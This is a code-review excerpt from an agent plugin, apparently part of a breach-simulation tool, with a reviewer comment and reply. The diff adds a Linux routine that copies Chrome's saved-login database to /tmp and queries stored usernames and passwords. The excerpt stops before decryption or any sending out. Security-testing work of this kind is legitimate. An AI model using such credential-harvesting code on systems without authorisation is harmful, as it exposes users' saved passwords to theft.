monkey/agent_plugins/credentials_collectors/chrome/src/linux_database_reader.py

```diff
@@ -0,0 +1,41 @@
+import logging
+import os
+import shutil
+import sqlite3
+from collections.abc import Callable, Iterator
+from pathlib import Path
+
+logger = logging.getLogger(__name__)
+
+DB_TEMP_PATH = "/tmp/chrome.db"
+DB_SQL_STATEMENT = "SELECT username_value,password_value FROM logins"
+
+ExtractedCredentialPair = tuple[str, bytes]
+DatabaseReader = Callable[[Path], Iterator[ExtractedCredentialPair]]
+
+
+def get_credentials_from_database(
+    database_path: Path,
+) -> Iterator[ExtractedCredentialPair]:
+    if database_path.is_file():
+        try:
+            shutil.copyfile(database_path, DB_TEMP_PATH)
+
+            conn = sqlite3.connect(DB_TEMP_PATH)
+        except Exception:
+            logger.exception("Error encounter while connecting to " f"database: {database_path}")
+            os.remove(DB_TEMP_PATH)
```

Comment:
We should handle this the same way we do in the Windows collector.

Reply:
Updated. Also added a task to the issue to make sure we merge these, since the code is essentially the same between the two branches